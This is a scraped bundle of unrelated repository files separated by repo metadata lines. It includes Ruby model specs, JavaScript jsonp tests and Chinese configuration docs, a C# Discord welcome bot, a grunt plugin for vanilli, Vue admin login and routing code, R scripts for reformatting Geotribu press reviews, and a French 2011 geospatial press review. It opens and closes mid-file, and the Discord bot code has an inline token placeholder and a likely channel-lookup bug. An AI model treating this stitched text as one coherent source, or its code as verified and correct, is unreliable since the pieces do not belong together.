it {should have_valid(:body).when('<EMAIL>', '<EMAIL>')}
it {should_not have_valid(:body).when(nil, '')}
end
<file_sep>require 'spec_helper'
describe Category do
it {should have_valid(:type).when('work', 'personal')}
it {should_not have_valid(:type).when(nil, '')}
end
<file_sep>class Category < ActiveRecord::Base
validates_presence_of :type
end
|
59aa8e9b9c86eb67401f97588192b4a07d35c621
|
[
"Ruby"
] | 7 |
Ruby
|
LNauman/blog
|
9bf2ebff844de4618f687d60dd3443e84967cb49
|
080a22962864edc8b3956e4d5ab29a311e07f01b
|
refs/heads/master
|
<repo_name>yuanzhian/tua-api<file_sep>/test/__tests__/jsonp.test.js
import { fakeGetApi } from '@examples/apis-web/'
import { ERROR_STRINGS } from '@/constants'
jest.mock('fetch-jsonp')
/**
* @type {*}
*/
const fetchJsonp = require('fetch-jsonp')
const data = [0, 'array data']
const returnVal = { code: 0, data: 'array data' }
describe('mock data', () => {
test('mock object data', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
/**
* @type {*}
*/
const resData = await fakeGetApi.mockObjectData()
expect(resData.code).toBe(404)
})
})
describe('fake jsonp requests', () => {
test('async-common-params', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const resData = await fakeGetApi.acp()
expect(resData).toEqual(returnVal)
})
test('array-data', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const resData = await fakeGetApi.ap({})
expect(resData).toEqual(returnVal)
})
test('object-params', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const resData = await fakeGetApi.op({ param3: 'steve' })
expect(resData).toEqual(returnVal)
})
test('invalid-req-type', () => {
return expect(fakeGetApi.irt({ param3: 'steve' }))
.rejects.toEqual(TypeError(ERROR_STRINGS.reqTypeFn('foobar')))
})
test('data should be passed through afterFn', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const { afterData } = await fakeGetApi.afterData()
expect(afterData).toBe('afterData')
})
test('there must be some data after afterFn', async () => {
fetchJsonp.mockResolvedValue({ json: () => data })
const resData = await fakeGetApi.noAfterData()
expect(resData).toEqual(returnVal)
})
})
<file_sep>/docs/config/runtime.md
# 运行配置 <Badge text="1.0.0+"/>
运行配置指的是在接口实际调用时通过第二个参数传递的配置。这部分的配置优先级最高。
以下接口以导出为 `exampleApi` 为例。
```js
exampleApi.foo(
{ ... }, // 第一个参数传接口参数
{ ... } // 第二个参数传接口配置
)
```
## callbackName 回调函数名称
在通过 jsonp 发起请求时,为了使用缓存一般需要添加 callbackName,但是注意重复请求时会报错。
```js
exampleApi.foo(
{ ... },
{ callbackName: `foo` }
)
```
## 其他参数
公共配置一节中的所有参数(除了 `pathList` 外),以及自身配置一节中的所有参数均有效,且优先级最高。
* 详情参阅[公共配置](./common.md)
* 详情参阅[自身配置](./self.md)
|
38f6f8c3f51c52c0bb7d208a2d91b8bf0143955d
|
[
"JavaScript",
"Markdown"
] | 2 |
JavaScript
|
yuanzhian/tua-api
|
d867b9c9621ba0a79416b60fea8284ad42583370
|
f27f40833c315e0d3a55d7f885d953423bc5e72c
|
refs/heads/master
|
<file_sep>using System;
using System.Threading.Tasks;
using System.Reflection;
using Discord;
using Discord.WebSocket;
using Discord.Commands;
using Microsoft.Extensions.DependencyInjection;
using System.Collections.Generic;
using System.Linq;
using Microsoft.EntityFrameworkCore;
namespace DiscordBot
{
class Program
{
private CommandService _commands;
private DiscordSocketClient _client;
private IServiceProvider _services;
private static void Main(string[] args) => new Program().StartAsync().GetAwaiter().GetResult();
public async Task StartAsync()
{
_client = new DiscordSocketClient();
_commands = new CommandService();
// Avoid hard coding your token. Use an external source instead in your code.
string token = "<KEY>";
_services = new ServiceCollection()
.AddSingleton(_client)
.AddSingleton(_commands)
.BuildServiceProvider();
await InstallCommandsAsync();
try
{
await _client.LoginAsync(TokenType.Bot, token);
await _client.StartAsync();
_client.MessageUpdated += MessageUpdated;
_client.UserJoined += _client_UserJoined;
_client.GuildMemberUpdated += _client_GuildMemberUpdated;
_client.Ready += () =>
{
Console.WriteLine("Bot is connected!");
return Task.CompletedTask;
};
}
catch(Exception ex)
{
Console.WriteLine(ex.Message);
}
await Task.Delay(-1);
}
public async Task InstallCommandsAsync()
{
// Hook the MessageReceived Event into our Command Handler
_client.MessageReceived += HandleCommandAsync;
// Discover all of the commands in this assembly and load them.
await _commands.AddModulesAsync(Assembly.GetEntryAssembly());
}
private async Task HandleCommandAsync(SocketMessage messageParam)
{
// Don't process the command if it was a System Message
var message = messageParam as SocketUserMessage;
if (message == null)
return;
var context = new SocketCommandContext(_client, message);
if (message.Content.ToLower().Contains("i accept") && message.Author != _client.CurrentUser)
{
var user = context.User as SocketGuildUser;
await user.AddRoleAsync(context.Guild.Roles.First(r => r.Name == "Member"));
//await user.RemoveRoleAsync(context.Guild.Roles.First(r => r.Name == "everyone"));
await context.Channel.SendMessageAsync("Welcome to the community " + user.Mention);
return;
}
int argPos = 0;
// Determine if the message is a command, based on if it starts with '!' or a mention prefix, or if
if (!(message.HasCharPrefix('!', ref argPos) || message.HasMentionPrefix(_client.CurrentUser, ref argPos)))
return;
else
{
// Create a Command Context
// Execute the command. (result does not indicate a return value,
// rather an object stating if the command executed successfully)
var result = await _commands.ExecuteAsync(context, argPos, _services);
if (!result.IsSuccess)
await context.Channel.SendMessageAsync(result.ErrorReason);
}
}
private async Task MessageUpdated(Cacheable<IMessage, ulong> before, SocketMessage after, ISocketMessageChannel channel)
{
// If the message was not in the cache, downloading it will result in getting a copy of `after`.
var message = await before.GetOrDownloadAsync();
Console.WriteLine($"{message} -> {after}");
}
private async Task _client_UserJoined(SocketGuildUser arg)
{
await sendUserAcceptance(arg);
}
private async Task _client_GuildMemberUpdated(SocketGuildUser arg1, SocketGuildUser arg2)
{
if(arg1.Status == UserStatus.Offline && (arg2.Status == UserStatus.Idle || arg2.Status == UserStatus.Online))
await sendUserAcceptance(arg1);
}
private async Task sendUserAcceptance(SocketGuildUser user)
{
IRole toIgnore = user.Guild.Roles.First(r => r.Name == "Member");
if (!user.Roles.Contains(toIgnore))
{
var chat = _client.GroupChannels.First(c => c.Name == "welcome");
await chat.SendMessageAsync("Welcome to the server " + user.Mention + " In order to proceed you will need to accept the following rules " + Environment.NewLine + "If you are happy with the above please type **I Accept**");
}
else
return;
}
private async Task performDatabaseStuff()
{
using (var db = new BloggingContext())
{
var blogs = db.Blogs
.Include(blog => blog.Posts)
.ToList();
await db.Blogs.AddAsync(new Blog { Url = "http://blogs.msdn.com/adonet", Posts = new List<Post>() { new Post() { Content = "Test" } } });
//Awaiting database addition
var count = db.SaveChanges();
Console.WriteLine("{0} records saved to database", count);
Console.WriteLine();
Console.WriteLine("All blogs in database:");
foreach (var blog in db.Blogs)
{
Console.WriteLine(" - {0}", blog.Url);
}
}
}
}
}
<file_sep>using Discord.Commands;
using System.Threading.Tasks;
using Discord;
namespace DiscordBot
{
[Group("Schedule")]
public class InfoModule : ModuleBase<SocketCommandContext>
{
// ~say hello -> hello
[Command("add")]
[Summary("Add to schedule.")]
public async Task addScheduleAsync([Summary("Name of this Schedule to Add")] string name,[Summary("Days in mon-thu style")] string days, [Summary("Time in HH:MM format with 00:00-00:00 formatting")] string time, [Summary("Message to be displayed")] string message)
{
// ReplyAsync is a method on ModuleBase
await ReplyAsync("stuff");
}
[Command("remove")]
[Summary("Add to schedule.")]
public async Task removeScheduleAsync([Summary("Name of this Schedule to Remove")] string name)
{
// ReplyAsync is a method on ModuleBase
await ReplyAsync("stuff");
}
}
}
|
3599c6ee2ce325796350854cd15bf6bbe437ef50
|
[
"C#"
] | 2 |
C#
|
DatenThielt/WyvernRealmsBot
|
fe941944e86108e3b71dcab6a0beab0560d22c09
|
a80bbf3c5fa916bca357f69f0575fbd434b410ba
|
refs/heads/master
|
<repo_name>dimasiktehnik/scrollable-homepage<file_sep>/js/script.js
$(document).ready(function () {
$('#fullpage').fullpage({
licenseKey: '951BDF59-63F84E77-8768E365-3ACE3408',
scrollHorizontally: true,
anchors:['solution', 'engineering','carsharing','rental'],
menu: '#home-nav-list',
css3: true,
});
//menu
$('.nav-icon').click(function () {
$(this).toggleClass('open');
$('.menu-drop').toggleClass('open');
$('.header__logo').toggleClass('black');
});
});
|
dc34bda5e6b66ce20b2353a72fcc0148e9b28788
|
[
"JavaScript"
] | 1 |
JavaScript
|
dimasiktehnik/scrollable-homepage
|
5f85a923f378ae7c2df26c39feb61aa75d458eaf
|
26024b715fea7c38d47c35ef980742e6b69220bd
|
refs/heads/master
|
<file_sep>grunt-vanilli
=============
[](https://travis-ci.org/kelveden/grunt-vanilli)
> *IMPORTANT*: As of vanilli 3.x, this plugin is deprecated. Vanilli itself now provides its own javascript API that
> includes functions for managing the lifecycle of vanilli.
Grunt plugin for starting/stopping [vanilli](https://github.com/kelveden/vanilli).
Usage
-----
Installation:
npm install grunt-vanilli --save-dev
The plugin allows:
* Specification of the configuration for [vanilli](https://github.com/kelveden/vanilli) (see that project for configuration options).
* Starting vanilli with `vanilli:start`.
* Stopping vanilli with `vanilli:stop`.
Example
-------
vanilli: {
options: {
port: 14000,
logLevel: "debug"
}
}
...
grunt.loadNpmTasks('grunt-vanilli');
...
grunt.registerTask('test', ['vanilli:start', 'testmystuff', 'vanilli:stop' ]);
<file_sep>'use strict';
var vanilli = require('vanilli');
module.exports = function (grunt) {
var vanilliServer;
grunt.registerTask('vanilli', 'Start/Stop Vanilli', function (target) {
var config = this.options(),
targets = {
start: function () {
vanilliServer = vanilli.init(config);
vanilliServer.listen(config.port);
},
stop: function () {
vanilliServer.stop();
}
};
if (targets[ target ]) {
targets[ target ]();
} else {
throw new Error("Unrecognised target '" + this.target + "'.");
}
});
};
|
e72d26be0cea6c8a2d34c9a21d77b09fb64e2de1
|
[
"Markdown",
"JavaScript"
] | 2 |
Markdown
|
kelveden/grunt-vanilli
|
2c89df62ea5336573e80376413630c56e346a3ce
|
67656faffdf9d43372fbb4d02d2224adc3102023
|
refs/heads/master
|
<file_sep>var express = require('express');
var app = express();
var morgan = require('morgan');
var path = require('path');
var port = 3007;
app.use(morgan('dev'));
// set the front-end folder to serve public assets.
app.use(express.static('web'));
// set up our one route to the index.html file.
app.get('*', function (req, res) {
res.sendFile(path.join(__dirname + '/index.html'));
});
// Start the server.
app.listen(port);
console.log(`Listening on port ${port}...`);
console.log('Press CTRL+C to stop the web server...');<file_sep># LoginAuthentication
It is a small program for login authetication purpose which is written in node.js.
## How to use?
Just embedd this script at login authentication portal.
After successfull authentication it returns a JSON file which include data of a user which can be further used.
|
ee3384d93027cbb15bccc613b7259879b7ca2f7e
|
[
"JavaScript",
"Markdown"
] | 2 |
JavaScript
|
evilreborn/loginAuthentication
|
2bee9b53f82951a29a2b71aaf0d41f2a40a0b3c2
|
0beeec65055879f3d8e9ac4e7a682765c722f2e5
|
refs/heads/master
|
<repo_name>swxu2005/vue-element-admin<file_sep>/src/store/modules/user.js
import { loginByUsername, getUserInfo, getUserPermissions } from '@/api/login'
import { setToken } from '@/utils/auth'
import user from './user_'
user.actions.LoginByUsername = ({ commit }, userInfo) => {
const username = userInfo.username.trim()
return new Promise((resolve, reject) => {
loginByUsername(username, userInfo.password).then(response => {
const data = response.data.data
commit('SET_TOKEN', data.token)
setToken(data.token)
resolve()
}).catch(error => {
reject(error)
})
})
}
user.actions.GetUserInfo = ({ commit, state }) => {
return new Promise((resolve, reject) => {
Promise.all([
getUserInfo(),
getUserPermissions()
]).then((result) => {
const userInfoResult = result[0].data.data
const userPermissionsResult = result[1].data.data
if (userPermissionsResult && userPermissionsResult.length > 0) { // 验证返回的roles是否是一个非空数组
commit('SET_ROLES', userPermissionsResult)
} else {
reject('getInfo: roles must be a non-null array !')
}
commit('SET_NAME', userInfoResult.realName)
commit('SET_AVATAR', 'https://wpimg.wallstcn.com/f778738c-e4f8-4870-b634-56703b4acafe.gif')
commit('SET_INTRODUCTION', userInfoResult.introduction)
resolve(userPermissionsResult)
}).catch((error) => {
reject(error)
})
})
}
export default user
<file_sep>/src/router/modules/demo.js
/** When your routing table is too long, you can split it into small modules**/
import Layout from '@/views/layout/Layout'
const demoRouter = [
{
path: '/demo',
component: Layout,
name: 'Demo',
meta: {
title: 'demo',
icon: 'windows'
},
alwaysShow: true,
children: [
{
path: 'news',
component: () => import('@/views/demo/news'),
name: 'NewsManage',
meta: {
title: 'newsManage',
icon: 'file-word',
roles: ['demo:news:all']
}
}
]
}
]
export default demoRouter
<file_sep>/src/utils/httpUtil.js
import request from '@/utils/request'
import qs from 'qs'
/**
* GET请求
* @param {请求URL} url
* @param {请求参数,是一个对象,会被转成url中的query参数} params
*/
const getRequest = (url, params) => {
return new Promise((resolve, reject) => {
request({
method: 'get',
url,
params
}).then(({ data: res }) => {
resolve(res)
}).catch(err => {
reject(err)
})
})
}
/**
* POST/PUT/DELETE请求,发送对象
* @param {请求URL} url
* @param {请求参数,是一个对象} params
* @param {请求方法,默认POST,可指定PUT或DELETE} method
*/
const postRequest = (url, params, method = 'post') => {
return new Promise((resolve, reject) => {
request({
method,
url,
data: params
}).then(({ data: res }) => {
resolve(res)
}).catch(err => {
reject(err)
})
})
}
/**
* POST/PUT/DELETE请求,发送表单
* @param {请求URL} url
* @param {请求参数,是一个对象,会被转成表单发送} params
* @param {请求方法,默认POST,可指定PUT或DELETE} method
*/
const postFormRequest = (url, params, method = 'post') => {
return new Promise((resolve, reject) => {
request({
method,
url,
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
transformRequest: [function(data) {
data = qs.stringify(data)
return data
}],
data: params
}).then(({ data: res }) => {
resolve(res)
}).catch(err => {
reject(err)
})
})
}
export default {
getRequest,
postRequest,
postFormRequest
}
|
ffddfa5f9d073f91dec136e078d223655fd95ea4
|
[
"JavaScript"
] | 3 |
JavaScript
|
swxu2005/vue-element-admin
|
73276f2d71669ab96220f3f20ea6edebcb95c0fa
|
62753c9eb7a1bf9e57fcb11583d531bcc593c8b9
|
refs/heads/master
|
<file_sep>### Song Map
[Song Map](http://www.wearedorothy.com/art/song-map-signed-and-stamped-limited-edition/) est une carte urbaine réalisée par le collectif [Dorothy](http://www.wearedorothy.com/) où les noms de rues ont été remplacés par des titres de chansons. L'avenue la plus importante est bien entendu Highway to hell! Pour les amateurs de musique, la carte peut également s'accompagner d'une playlist concoctée par les auteurs
<file_sep># Issue : https://github.com/geotribu/website/issues/443
# PR : https://github.com/geotribu/website/pull/444
# Corriger les niveaux de titre
# Retirer les anciennes ancres #news
# Balises d'accessibilité manquantes
# Anciennes URLs d'images
library(tidyverse)
library(stringr)
source("helpers.R", encoding = "UTF-8")
year <- 2011
inputFolder <<- "../../rdp/"
outputFolder <<- "../../website/content/rdp"
reformatYear <- function(year, inputFolder, outputFolder) {
rdps <- listRdpsForYear(year)
# Transformation fichier par fichier
for(i in 1:length(rdps)) {
rdp <- rdps[i]
message(">> ", i, " : ", rdp)
reformatRdp(rdp, outputFolder)
}
}
# Reformate toutes les rdps d'une année
reformatYear(year, inputFolder, outputFolder) # reformater une année
# Reformate une rdp
# reformatRdp("../../website/content/rdp/2011/rdp_2011-12-23.md") # reformater une rdp
# reformatRdp("../../rdp//2012/rdp_2012-06-04.md", 2012, inputFolder, outputFolder) # reformater une rdp<file_sep>source("helpers.R")
library(stringr)
library(tidyverse)
lines
rdp <- "../../rdp/2011/rdp_2011-12-23.md"
lines <- readRdp(rdp)
newLines <- reformatLinks(lines)
myLine <- lines[101]
# # myLine <- 'toto [logo](titi) toto [logo test22](https://tata) toto [](https://tutu23)'
# httpLinks <- str_extract_all(lines, "\\[\\S*\\s?\\S*\\]\\(\\S+\\)") %>% unlist
# imageLinks <- str_extract_all(lines, "\\!\\[\\S*\\s?\\S*\\]\\(\\S+\\)") %>% unlist
# links <- c(httpLinks, imageLinks)
# Accessibilité ----
imgLink1 <- ""
imgLink2 <- ''
isAccessible(imgLink1)
isAccessible(imgLink2)
if(!isAccessible(imgLink1)) {
addAccessibility(imgLink1)
}
addAccessibility(imageLinks[12])
addAccessibility(imageLinks[1])
test <- sapply(imageLinks, addAccessibility) %>% as.character
test
# Réponse ----
# Annexes ----<file_sep># Tests de relocalisation de thumbnails
rdp <- "../../rdp/2011/rdp_2011-12-23.md"
# rdp <- "../../rdp/2011/rdp_2011-12-30.md"
# rdp <- "../../rdp/2011/rdp_2011-03-18.md"
# rdp <- "../../rdp/2011/rdp_2011-03-18.md"
source("helpers.R", encoding = "UTF-8")
lines <- readRdp(rdp)
# grepl("gvSIG", lines) %>% which
# lines[39]
# reformatLine(lines[39])
# newLines <- reformatTitles(lines)
# sapply(newLines, length)
# METTRE THUMB DANS LE POST
lines <- reformatTitles(lines)
lines <- relevelTitles(lines)
lines <- reformatLeadingSpace(lines)
lines <- relocateThumbs(lines)
lines <- reformatLinks(lines)
grep("Earth as art", lines) -> w
lines[w]
#
# grepl("gvSIG", lines) %>% which -> w
# lines[w]
# reformatRdp(rdp, outputFolder)
writeRdp(lines, "temp.md")
<file_sep># Géotribu
Reformater, nettoyer, analyser les revues de presse [Géotribu](http://static.geotribu.fr/)
## [`reformat.R`](https://github.com/datagistips/geotribu/blob/master/reformat.R)
Issue : https://github.com/geotribu/website/issues/443
PR : https://github.com/geotribu/website/pull/444
### Exemples de rdp mal formatées
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-01-21.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-01-28.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-02-04.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-02-11.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-03-18.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-05-13.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-06-03.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-06-24.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-07-08.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-07-15.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-07-22.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-08-12.md **
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-08-26.md
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-09-09.md **
- https://raw.githubusercontent.com/geotribu/website/fix/old_rdp/content/rdp/2011/rdp_2011-09-16.md - espaces
- ...
#### 21 Janvier 2011
- Avant : https://github.com/geotribu/website/blob/fenfyx2/content/rdp/2011/rdp_2011-01-21.md
- Après : https://github.com/geotribu/website/blob/fenfyx2/content/rdp/2011/rdp_2011-01-21-new.md
- Log : https://github.com/geotribu/website/blob/fenfyx2/content/rdp/rdp_2011-01-21-log.md
#### 23 Décembre 2011
- Avant : https://static.geotribu.fr/rdp/2011/rdp_2011-12-23/
- Après : https://preview-pullrequest-444--geotribu-preprod.netlify.app/rdp/2011/rdp_2011-12-23/
### Voir les modifs
https://preview-pullrequest-444--geotribu-preprod.netlify.app/rdp/2011/rdp_2011-12-23/
### Cas traités
Reformate les cas suivants :
### L'Open Data en image** lorem ipsum
## L'Open Data en image** lorem ipsum
L'Open Data en image** lorem ipsum
**OpenLayers Mobile** lorem ipsum
**gvSIG** lorem ipsum
## TODO
- [ ] Créer des fonctions pour reformatTitle, relevelTitle
- [ ] Repositionner les thumbnails
- [x] Reformater les titres
- [ ] Trouver les liens morts : images,...
- [ ] Créer un JSON depuis une rdp :
- thumbnail
- catégorie
- liens
- images
- technos identifiées
- Libérer le JSON
- [ ] Repositionner le log
- [ ] relocateThumbs KO
## VIZ
- Compter les catégories barplot avec d3
- voir adjectif après carte
- voir les noms de domaines les plus fréquents
- voir les technos dont on a parlé
- suivre la quantit? de rdps dans le temps, là où il n'y en a pas
- voir le mot clé QGIS, MapBox, IGN, OpenData, Data, Data Science, Intelligence artificielle
- Les jours de publication de la rdp
- beeswarm ou word cloud temporel
- topic modeling ?
- Nb de mots
- Nb de news
- En fonction du logo : type de news
- Transformer les news en JSON
- Sortie de la semaine en niveau 4, doit être en niveau 2..
<file_sep>---
title: "Revue de presse du 23 décembre 2011"
authors:
- Geotribu
categories:
- revue de presse
date: 2011-12-23
description: "Revue de presse du 23 décembre 2011"
tags:
- GDAL
- GeoExt
- GeoNetwork
- GeoServer
- GéoSource
- GeoTools
- gvSIG
- HTML5
- OGR
- open data
- pgRouting
---
# Revue de presse du 23 décembre 2011
{: .img-rdp-news-thumb }
Vous êtes déjà en vacances ou encore au bureau ? Mais est-ce une raison pour manquer la revue de presse de Geotribu. Cette semaine, nous aborderons notamment, la librairie Google Vector Layer, les journées internationales gvSIG, de l'Open Data mais aussi les sorties de la semaine.
Bonne lecture :book:.
----
## Client
### Google Vector Layers
{: .img-rdp-news-thumb }
Ajouter des données KML à Google Maps est un jeu d'enfant. Mais cela se corse quand vous souhaitez intégrer d'autres formats provenant par exemple d'ArcGIS Server, GeoCommons ou encore CartoDB.
Si vous êtes dans ce cas, sachez que <NAME> offre depuis peu une nouvelle librairie, nommée [Google Vector Layer](http://geojason.info/google-vector-layers/), permettant notamment de faciliter l'ajout de différentes sources et surtout la gestion de gros volumes de données. Pour cela, Google Vector Layer ne va pas afficher l'ensemble des données disponibles mais seulement celles correspondant à l'extension de la carte. Mais les potentialités de cette librairie ne s'arrêtent pas là.
En effet, elle offre également un moteur de template pour les infobulles, une gestion facilitée de la symbologie ainsi qu'une intégration plus simple des données temps réel. Mais le plus simple est je pense de jeter un œil aux [démos](http://geojason.info/google-vector-layers/demos/) disponibles et si vous êtes convaincus, sachez que le code source est disponible sur [GitHub](https://github.com/JasonSanford/google-vector-layers)
### Cartographie en HTML5
{: .img-rdp-news-thumb }
Nous avions déjà eu l'occasion d'aborder à plusieurs reprises la librairie [D3](http://mbostock.github.com/d3/). Celle-ci permet notamment de transformer vos données brutes en diagramme intelligible et compréhensible. Les [modes de représentation](http://mbostock.github.com/d3/ex/) sont multiples et il est bien évidemment possible d'utiliser la carte comme média de communication ([carte choroplète](http://mbostock.github.com/d3/ex/choropleth.html), [cartogram](http://mbostock.github.com/d3/ex/cartogram.html)).
Néanmoins, ces exemples sont malheureusement figés. Impossible de zoomer ou de se déplacer. C'était sans compter le talent de [tokumine](http://vizzuality.com/team/stokumine) qui nous offre une [série d'exemples](https://github.com/Vizzuality/HTML5-experiments) alliant d3 et interactivité. Le code source utilisé est également disponible
### gvSIG
{: .img-rdp-news-thumb }
La 7ème édition des journées internationales de gvSIG s'est déroulée du 30 novembre au 2 décembre derniers à Valence. Les publications, articles, posters et présentations de l’évènement sont disponibles sur le site officiel. Attention, hispanophobes s'abstenir car que la page soit disponible [en anglais](http://jornadas.gvsig.org/comunicaciones/reports/view?set_language=en) et [en espagnol](http://jornadas.gvsig.org/comunicaciones/ponencias/view?set_language=es), ne change rien : tous les contenus sont en espagnol. L'évènement se déroulait à Valence et le projet est profondément ancré dans la langue de Cervantès.
Qu'importe, le logiciel est disponible en beaucoup de langues différentes et gagnerait à être davantage connu des aficionados de Molière ! Pour Noël, offrez-vous (gratuit et autonome) une découverte du cousin de QGIS : [votre cadeau opensource](http://www.gvsig.org/web/) !
### Calculer des itinéraires avec OpenStreetMap
{: .img-rdp-news-thumb }
Cette semaine, grâce à [<NAME>](http://www.portailsig.org/users/gene) du [PortailSIG](http://www.portailsig.org), nous apprendrons comment [calculer un itinéraire](http://www.portailsig.org/content/osm2po-ou-le-calcul-simple-d-itineraires-avec-les-donnees-openstreetmap) à partir des données [OpenStreetMap](https://www.openstreetmap.org). Pour cela l'auteur nous présente un outil nommé [osm2po](http://osm2po.de/). Ce dernier a la particularité d'être à la fois un moteur de routage (ça se dit ??) mais aussi un convertisseur permettant d'exploiter les résultats obtenus dans Postgresql.
Mais le mieux, est de consulter le billet de Martin qui présente toutes les étapes nécessaires. Pour ceux qui veulent en savoir un peu plus sur PgRouting, un autre article est disponible sur [le blog "l'aménagerie"](http://elcep.legtux.org/?p=324). Remercions dans tous les cas, [UnderDark](https://twitter.com/#!/underdarkGIS), la contributrice anglophone à l"origine du contenu des deux cas présentés. N'hésitez pas à visiter [son blog : c'est une mine](http://underdark.wordpress.com/)
----
## Open Data
{: .img-rdp-news-thumb }
Bien que le mouvement Open Source et Open Data soient par nature différents, il n'empêche que la philosophie qui les anime et la même. Preuve en est, la plateforme qui propulse OpenData.gov, [l'Open Data Américain, devient Open Source](http://www.bulletins-electroniques.com/actualites/68571.htm). Cette libération du code est, comme j'aime à le rappeler lors de mes interventions, un contrat gagnant/gagnant pour tout le monde. En effet, si une communauté suffisante se crée, cela permettra de faire évoluer l'outil à moindre coût et pour les utilisateurs c'est l'assurance de disposer d'une plateforme pérenne. Le [code source](https://github.com/opengovplatform/opengovplatform) est disponible sur GitHub.
### Debug data.gouv.fr
{: .img-rdp-news-thumb }
Depuis l'ouverture du portail data.gouv.fr il y a de cela 2 semaines, beaucoup de critiques pleuvent. Il faut dire qu'entre des formats propriétaires, des données illisibles à cause de leur qualité médiocre etc. il y a de quoi alimenter une levée de boucliers ! Si vous êtes aussi du genre à râler, [Regards citoyens](http://www.regardscitoyens.org/) a lancé un site pour contribuer à améliorer le portail de l'opendata francais : [Debug data.gouv.fr](http://www.debug-data-gouv.fr/).
Un petit retour sur les données disponibles lors de leur intégration dans [Data-Publica](http://www.data-publica.com/) est disponible sur [le blog de la société](http://www.data-publica.com/content/2011/12/data-publica-importe-et-indexe-l%E2%80%99ensemble-des-donnees-de-data-gouv-fr/)
----
## Sortie de la semaine
### Sortie de GDAL 1.9 beta 2 et petit récapitulatif des ressources importantes du projet
{: .img-rdp-news-thumb }
On se rapproche doucement de la "release" stable de GDAL 1.9. Celle-ci apporte des nouveautés intéressantes. Ainsi vous pouvez par exemple, [utiliser des données distantes](http://erouault.blogspot.com/2011/12/seamless-access-to-remote-global-multi.html) puis les consolider sans avoir besoin de télécharger sur votre poste. Pour un aperçu de l'ensemble des nouvelles fonctionnalités, nous vous invitons à consulter [les infos liées à la release](http://trac.osgeo.org/gdal/wiki/Release/1.9.0-News). Même si ce n'est pas lié directement aux nouvelles fonctionnalités, nous en profitons pour vous faire découvrir comment faire [des effets de relief](http://linfiniti.com/2011/12/creating-coloured-rasters-with-gdal/) avec GDAL. Pour le manuel de référence en français de la version 1.9, allez sur <http://gdal.gloobe.org/>. Si vous avez besoin de manipuler ogr/gdal via Python, un [petit rappel sur l'API](http://gdal.org/python/) ne peut pas faire de mal. Toujours en Python, si vous voulez séparer vos environnements, [ce guide](http://tylerickson.blogspot.com/2011/09/installing-gdal-in-python-virtual.html) sera votre ami. Nous vous rappelons aussi l'existence de [ce très bon guide](http://georezo.net/forum/viewtopic.php?pid=162315#p162315) sur la partie raster. N'oublions pas non plus [le site officiel du projet](http://www.gdal.org). N'hésitez pas à nous faire remonter d'autres sources sur GDAL si nous les avons oubliés
### Fiona passe en 0.5
{: .img-rdp-news-thumb }
Non ce n'est pas de la fiancée de Shrek dont nous allons parler (ok, ok je sors mais c'était tentant !) mais d'une surcouche ajoutée à OGR. [<NAME>](http://sgillies.net/), participant actif et bien connu de l'OpenSource est l'auteur de cette librairie. [Fiona](https://github.com/sgillies/Fiona) se veut être une alternative plus élégante à l'API existante. Au passage, j'en profite également pour signaler ce [post](http://www.neogeo-online.net/blog/archives/1649/) paru sur NeoGeo Online qui aborde notamment cette librairie
### Nouvelle version de GeoTools
{: .img-rdp-news-thumb }
La librairie géospatiale en Java de l'OSGeo sort en version 2.7.4 en corrigeant quelque 39 bugs et en apportant quelques améliorations et nouveautés.
[Site de GeoTools](http://geotoolsnews.blogspot.com/2011/12/geotools-274-released.html)
### GeoServer version 2.1.3
{: .img-rdp-news-thumb }
Restons dans le domaine de la correction de bugs avec la [sortie de GeoServer en version 2.1.3](http://blog.geoserver.org/2011/12/21/geoserver-2-1-3-released/). Néanmoins, nous pouvons noter quelques améliorations comme l'ajout de l'authentification pour les couches WMS en cascade ou encore le support de processus WPS asynchrones.Plus d'infos sont disponibles sur le [changelog](http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=10311&version=17865). Il faut aussi noter que Geoserver dispose maintenant d'une documentation en français issue de la traduction de la version anglaise. Ce travail a été effectué dans le cadre de Georchestra, une IDS (Infrastructure de Données Spatiales). Pour en savoir plus, allez sur [l'annonce officielle](http://blog.georchestra.org/post/2011/12/17/GeoServer-%3A-traduction-de-la-doc-en-fran%C3%A7ais)
### Nouvelle version de GéoSource
{: .img-rdp-news-thumb }
Le "Geonetwork à la sauce française", développé principalement par le BRGM, vient aussi de publier une nouvelle version. De très bonnes nouvelles en termes de performance et de gros efforts sur la documentation et l'assistance sont au menu de cette dernière mouture. [L'excellent NeoGeo passe en revue les principales nouveautés de cette version](http://www.neogeo-online.net/blog/archives/1660/)
### GeoExt version 1.1
{: .img-rdp-news-thumb }
Lors de la dernière revue de presse, nous vous annoncions la sortie de la Release Candidate. Cette semaine c'est au tour de la version [stable](http://geoext.blogspot.com/2011/12/announcing-geoext-11.html). Tous les détails sur cette nouvelle version [ici](http://trac.geoext.org/wiki/Release/1.1/Notes). Le code source est téléchargeable sur [Github](https://github.com/geoext/geoext)
----
## Divers
### The Nine Eyes of Google Street View
{: .img-rdp-news-thumb }
